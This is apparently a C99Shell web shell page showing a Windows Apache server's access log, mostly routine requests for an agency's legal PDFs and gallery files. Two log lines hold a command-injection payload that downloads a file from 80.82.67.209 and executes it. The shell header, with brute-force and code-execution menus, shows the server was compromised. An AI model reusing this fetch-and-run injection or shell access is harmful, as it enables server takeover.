!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2019.12.08.log (1.49 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
66.249.64.63 - - [08/Dec/2019:00:00:00 -0500] "GET /BLA/resoluciones/AUTOS%202016/0048.pdf HTTP/1.1" 200 822626
192.168.175.104 - - [08/Dec/2019:00:00:16 -0500] "GET / HTTP/1.0" 200 9990
54.36.150.129 - - [08/Dec/2019:00:00:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%201-50/00000001.tif HTTP/1.1" 200 46412
69.162.124.232 - - [08/Dec/2019:00:00:43 -0500] "HEAD / HTTP/1.1" 200 -
195.154.122.11 - - [08/Dec/2019:00:01:02 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
195.154.122.11 - - [08/Dec/2019:00:01:02 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
195.154.122.11 - - [08/Dec/2019:00:01:02 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
195.154.122.11 - - [08/Dec/2019:00:01:02 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
195.154.122.11 - - [08/Dec/2019:00:01:03 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
195.154.122.11 - - [08/Dec/2019:00:01:04 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
195.154.122.11 - - [08/Dec/2019:00:01:04 -0500] "GET /galeria/nivo-slider/demo/inicio.html HTTP/1.1" 200 4350
195.154.122.11 - - [08/Dec/2019:00:01:04 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
195.154.122.11 - - [08/Dec/2019:00:01:04 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
195.154.122.11 - - [08/Dec/2019:00:01:04 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
195.154.122.11 - - [08/Dec/2019:00:01:04 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
195.154.122.11 - - [08/Dec/2019:00:01:04 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
195.154.122.11 - - [08/Dec/2019:00:01:04 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
195.154.122.11 - - [08/Dec/2019:00:01:05 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
66.249.64.63 - - [08/Dec/2019:00:01:26 -0500] "GET /BLA/resoluciones/AUTOS%202017/1720.pdf HTTP/1.1" 200 595149
186.84.21.115 - - [08/Dec/2019:00:01:36 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
186.84.21.115 - - [08/Dec/2019:00:01:36 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.84.21.115 - - [08/Dec/2019:00:01:36 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
216.244.66.195 - - [08/Dec/2019:00:01:51 -0500] "GET /BLA/resoluciones/AUTOS%202014/1295.pdf HTTP/1.1" 200 160807
207.46.13.185 - - [08/Dec/2019:00:02:16 -0500] "GET /BLA/boletinlegal/Circulares/2010/Circular%2006%20de%208%20de%20septiembre%20de%202010.pdf HTTP/1.1" 200 4657752
46.229.168.163 - - [08/Dec/2019:00:02:32 -0500] "GET /robots.txt HTTP/1.1" 404 1019
46.229.168.132 - - [08/Dec/2019:00:02:32 -0500] "GET /Autoliquidacion/index.php?dir=TR%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%81MITES%2BAGUAS%2BSUBTERR%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%83%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%83%C3%83%C2%82%C3%82%C2%82%C3%83%C2%83%C3%82%C2%82%C3%83%C2%82%C3%82%C2%81NEAS%2F&order=desc&sort=size HTTP/1.1" 200 9678
157.55.39.77 - - [08/Dec/2019:00:02:47 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20003%20de%20Febrero%20de%202011.pdf HTTP/1.1" 200 224758
66.249.64.63 - - [08/Dec/2019:00:02:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/1760.pdf HTTP/1.1" 200 499114
216.244.66.195 - - [08/Dec/2019:00:03:31 -0500] "GET /BLA/resoluciones/AUTOS%202014/2285.pdf HTTP/1.1" 200 218447
191.74.92.110 - - [08/Dec/2019:00:03:41 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
191.74.92.110 - - [08/Dec/2019:00:03:41 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
191.74.92.110 - - [08/Dec/2019:00:03:41 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
192.168.175.104 - - [08/Dec/2019:00:03:44 -0500] "GET / HTTP/1.1" 200 9990
191.74.92.110 - - [08/Dec/2019:00:03:45 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 304 -
191.74.92.110 - - [08/Dec/2019:00:03:45 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 304 -
191.74.92.110 - - [08/Dec/2019:00:03:45 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 304 -
66.249.64.59 - - [08/Dec/2019:00:04:17 -0500] "GET /BLA/resoluciones/AUTOS%202017/0457.pdf HTTP/1.1" 200 571515
66.249.64.59 - - [08/Dec/2019:00:05:00 -0500] "GET /BLA/resoluciones/AUTOS%202017/1972.pdf HTTP/1.1" 200 259509
192.168.175.104 - - [08/Dec/2019:00:05:13 -0500] "GET / HTTP/1.0" 200 9990
66.249.64.63 - - [08/Dec/2019:00:05:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2111.pdf HTTP/1.1" 200 646329
69.162.124.232 - - [08/Dec/2019:00:05:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.61 - - [08/Dec/2019:00:06:26 -0500] "GET /BLA/resoluciones/AUTOS%202014/6596.pdf HTTP/1.1" 200 454495
40.77.167.159 - - [08/Dec/2019:00:06:58 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.59 - - [08/Dec/2019:00:07:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2882.pdf HTTP/1.1" 200 413700
193.124.188.83 - - [08/Dec/2019:00:07:30 -0500] "HEAD / HTTP/1.1" 200 -
194.67.210.77 - - [08/Dec/2019:00:07:31 -0500] "HEAD / HTTP/1.1" 200 -
193.124.190.18 - - [08/Dec/2019:00:07:31 -0500] "HEAD / HTTP/1.1" 200 -
193.124.191.92 - - [08/Dec/2019:00:07:31 -0500] "HEAD / HTTP/1.1" 200 -
193.124.188.188 - - [08/Dec/2019:00:07:31 -0500] "HEAD / HTTP/1.1" 200 -
194.67.207.9 - - [08/Dec/2019:00:07:31 -0500] "HEAD / HTTP/1.1" 200 -
185.125.219.13 - - [08/Dec/2019:00:07:31 -0500] "HEAD / HTTP/1.1" 200 -
194.67.207.94 - - [08/Dec/2019:00:07:31 -0500] "HEAD / HTTP/1.1" 200 -
185.5.249.185 - - [08/Dec/2019:00:07:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.59 - - [08/Dec/2019:00:08:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3188.pdf HTTP/1.1" 200 846557
192.168.175.104 - - [08/Dec/2019:00:08:43 -0500] "GET / HTTP/1.1" 200 9990
66.249.88.19 - - [08/Dec/2019:00:08:46 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
66.249.88.23 - - [08/Dec/2019:00:08:46 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
66.249.88.23 - - [08/Dec/2019:00:08:46 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
54.36.150.141 - - [08/Dec/2019:00:08:54 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2003%2FRES+2003+251-300%2F HTTP/1.1" 200 11115
181.55.249.154 - - [08/Dec/2019:00:09:08 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.55.249.154 - - [08/Dec/2019:00:09:08 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
181.55.249.154 - - [08/Dec/2019:00:09:08 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
66.249.64.59 - - [08/Dec/2019:00:09:18 -0500] "GET /BLA/resoluciones/AUTOS%202015/5604.pdf HTTP/1.1" 200 469301
54.36.150.39 - - [08/Dec/2019:00:09:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%201101-1150/00001122.tif HTTP/1.1" 200 135392
66.249.64.61 - - [08/Dec/2019:00:10:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/2527.pdf HTTP/1.1" 200 811067
192.168.175.104 - - [08/Dec/2019:00:10:12 -0500] "GET / HTTP/1.0" 200 9990
69.162.124.232 - - [08/Dec/2019:00:10:43 -0500] "HEAD / HTTP/1.1" 200 -
186.84.22.105 - - [08/Dec/2019:00:10:50 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.84.22.105 - - [08/Dec/2019:00:10:50 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.84.22.105 - - [08/Dec/2019:00:10:50 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
54.36.148.221 - - [08/Dec/2019:00:11:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201351-1400/20021363.tif HTTP/1.1" 200 122808
179.33.119.23 - - [08/Dec/2019:00:11:46 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
179.33.119.23 - - [08/Dec/2019:00:11:46 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
179.33.119.23 - - [08/Dec/2019:00:11:46 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
31.13.127.16 - - [08/Dec/2019:00:12:15 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 206 4586
31.13.127.17 - - [08/Dec/2019:00:12:15 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 206 48706
66.249.88.25 - - [08/Dec/2019:00:12:20 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.249.88.19 - - [08/Dec/2019:00:12:20 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
66.249.88.25 - - [08/Dec/2019:00:12:20 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
186.87.52.21 - - [08/Dec/2019:00:13:23 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.87.52.21 - - [08/Dec/2019:00:13:23 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.87.52.21 - - [08/Dec/2019:00:13:23 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
192.168.175.104 - - [08/Dec/2019:00:13:40 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.59 - - [08/Dec/2019:00:14:19 -0500] "GET /BLA/resoluciones/AUTOS%202012/2492.pdf HTTP/1.1" 200 1179114
54.36.149.61 - - [08/Dec/2019:00:14:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%203101-3150/00003131.tif HTTP/1.1" 200 138430
207.46.13.174 - - [08/Dec/2019:00:14:45 -0500] "GET /transparencia/directorioservidores/mayo2015.xlsx HTTP/1.1" 200 32554
66.249.64.59 - - [08/Dec/2019:00:15:02 -0500] "GET /BLA/resoluciones/AUTOS%202013/0182.pdf HTTP/1.1" 200 1298099
192.168.175.104 - - [08/Dec/2019:00:15:10 -0500] "GET / HTTP/1.0" 200 9990
54.36.148.239 - - [08/Dec/2019:00:15:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%20401-450/00000422.tif HTTP/1.1" 200 89066
69.162.124.232 - - [08/Dec/2019:00:15:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.59 - - [08/Dec/2019:00:15:44 -0500] "GET /BLA/resoluciones/AUTOS%202018/1397.pdf HTTP/1.1" 200 284095
66.102.8.189 - - [08/Dec/2019:00:16:18 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
66.102.8.189 - - [08/Dec/2019:00:16:18 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
66.102.8.187 - - [08/Dec/2019:00:16:18 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
66.102.8.189 - - [08/Dec/2019:00:16:18 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.102.8.187 - - [08/Dec/2019:00:16:18 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
66.102.8.191 - - [08/Dec/2019:00:16:18 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
66.102.8.187 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/demo/inicio.html HTTP/1.1" 200 4350
66.102.8.187 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
66.102.8.187 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
66.102.8.189 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
66.102.8.191 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20tinguas.jpg HTTP/1.1" 200 214878
66.102.8.189 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20RCD.jpg HTTP/1.1" 200 92197
66.102.8.189 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20Conpes.jpg HTTP/1.1" 200 55220
66.102.8.187 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
66.102.8.187 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
66.102.8.187 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
66.102.8.187 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
66.102.8.191 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/demo/images/puntos%20atencion%20BANNER.jpg HTTP/1.1" 200 244208
66.102.8.187 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/demo/images/Banneranonimos.png HTTP/1.1" 200 109388
66.102.8.191 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20practicas%20sostenibles.jpg HTTP/1.1" 200 142958
66.102.8.187 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20Visor%20Geografico%20Ambiental.jpg HTTP/1.1" 200 204673
66.102.8.191 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20consumo%20sostenible%20final.jpg HTTP/1.1" 200 364746
66.102.8.191 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/demo/images/bannerwebmusgo.jpg HTTP/1.1" 200 367364
66.102.8.189 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/demo/images/Bannercalculadora.jpg HTTP/1.1" 200 313099
66.102.8.189 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/demo/images/diciembrecaminatas.png HTTP/1.1" 200 510724
66.102.8.189 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/demo/images/banneriniciativa.jpg HTTP/1.1" 200 200385
66.102.8.187 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/demo/images/Banner%20POT.png HTTP/1.1" 200 418238
66.102.8.189 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/demo/images/banneragendamiento.jpg HTTP/1.1" 200 116897
66.102.8.191 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/demo/images/Bannerserpiente2019.jpg HTTP/1.1" 200 270374
66.102.8.189 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
66.102.8.189 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
66.102.8.191 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
66.102.8.191 - - [08/Dec/2019:00:16:19 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
66.249.64.63 - - [08/Dec/2019:00:16:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20601%20AL%20700/RESOLUCION%200665%20DE%202007.pdf HTTP/1.1" 200 1029294
201.245.192.253 - - [08/Dec/2019:00:16:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29342
201.245.192.253 - - [08/Dec/2019:00:16:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29336
157.55.39.77 - - [08/Dec/2019:00:16:48 -0500] "GET /ecodirectorio/files/res/downloads/download_0011.pdf HTTP/1.1" 404 1019
186.29.182.56 - - [08/Dec/2019:00:16:49 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.29.182.56 - - [08/Dec/2019:00:16:49 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.29.182.56 - - [08/Dec/2019:00:16:49 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
54.36.148.225 - - [08/Dec/2019:00:17:04 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2002%2FRES+2002+1951-1971%2F HTTP/1.1" 200 6225
66.249.64.59 - - [08/Dec/2019:00:17:10 -0500] "GET /BLA/resoluciones/AUTOS%202018/3537.pdf HTTP/1.1" 200 267518
201.245.192.253 - - [08/Dec/2019:00:16:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29336
208.113.204.147 - - [08/Dec/2019:00:17:15 -0500] "GET /repository/annotate?rev=`wget http://80.82.67.209/richard; curl -O http://80.82.67.209/richard; chmod +x richard; sh richard` HTTP/1.0" 404 1019
186.84.20.145 - - [08/Dec/2019:00:17:16 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 11866
186.84.20.145 - - [08/Dec/2019:00:17:20 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2005%2F HTTP/1.1" 200 35293
208.113.204.147 - - [08/Dec/2019:00:17:21 -0500] "GET /repository/annotate?rev=`wget http://80.82.67.209/richard; curl -O http://80.82.67.209/richard; chmod +x richard; sh richard` HTTP/1.0" 404 1019
186.84.20.145 - - [08/Dec/2019:00:17:31 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2005%2FRES+2005+2351-2400%2F HTTP/1.1" 200 12366
186.84.20.145 - - [08/Dec/2019:00:17:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%202351-2400/00002359.tif HTTP/1.1" 200 367280
66.249.64.59 - - [08/Dec/2019:00:17:47 -0500] "GET /BLA/resoluciones/AUTOS%202010/5385.pdf HTTP/1.1" 304 -
66.249.64.59 - - [08/Dec/2019:00:17:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/3903.pdf HTTP/1.1" 304 -
46.229.168.150 - - [08/Dec/2019:00:18:24 -0500] "GET /Anexos%20estudio%20Organizacional%20SDA/index.php?dir=ANEXO%2BNo.%2B6%2B-%2BAN%C3%83%C2%81LISIS%2BCOMPARADO%2BDECRETOS%2B109%2BY%2B175%2B2009%2BVRS.%2BESTUDIO%2BSERAMBIENTE%2F&order=asc&sort=date HTTP/1.1" 200 6265
66.249.64.59 - - [08/Dec/2019:00:18:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5937.pdf HTTP/1.1" 304 -
192.168.175.104 - - [08/Dec/2019:00:18:39 -0500] "GET / HTTP/1.1" 200 9990
66.249.64.59 - - [08/Dec/2019:00:19:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1584.pdf HTTP/1.1" 200 582411
216.244.66.195 - - [08/Dec/2019:00:19:27 -0500] "GET /BLA/resoluciones/AUTOS%202016/0916.pdf HTTP/1.1" 200 512122
216.244.66.195 - - [08/Dec/2019:00:19:32 -0500] "GET /BLA/resoluciones/AUTOS%202016/0970.pdf HTTP/1.1" 200 548999
216.244.66.195 - - [08/Dec/2019:00:19:37 -0500] "GET /BLA/resoluciones/AUTOS%202016/1104.pdf HTTP/1.1" 200 243463
66.249.64.59 - - [08/Dec/2019:00:20:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0785.pdf HTTP/1.1" 200 426198
192.168.175.104 - - [08/Dec/2019:00:20:08 -0500] "GET / HTTP/1.0" 200 9990
54.36.150.140 - - [08/Dec/2019:00:20:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%2001-50/2002RES4.tif HTTP/1.1" 200 57834
54.36.150.169 - - [08/Dec/2019:00:20:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%20951-1000/00000979.tif HTTP/1.1" 200 854622
69.162.124.232 - - [08/Dec/2019:00:20:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.59 - - [08/Dec/2019:00:20:45 -0500] "GET /BLA/resoluciones/AUTOS%202013/1288.pdf HTTP/1.1" 304 -
66.249.64.63 - - [08/Dec/2019:00:21:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3786.pdf HTTP/1.1" 304 -
54.36.148.29 - - [08/Dec/2019:00:21:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%20801-850/837.tif HTTP/1.1" 200 407664
40.77.167.38 - - [08/Dec/2019:00:21:46 -0500] "GET /ecodirectorio/files/res/downloads/book.pdf HTTP/1.1" 404 1019
216.244.66.195 - - [08/Dec/2019:00:21:54 -0500] "GET /BLA/resoluciones/AUTOS%202016/1280.pdf HTTP/1.1" 200 330084
66.249.64.59 - - [08/Dec/2019:00:22:11 -0500] "GET /BLA/resoluciones/AUTOS%202016/0226.pdf HTTP/1.1" 304 -
200.119.49.255 - - [08/Dec/2019:00:22:18 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
200.119.49.255 - - [08/Dec/2019:00:22:18 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
200.119.49.255 - - [08/Dec/2019:00:22:18 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
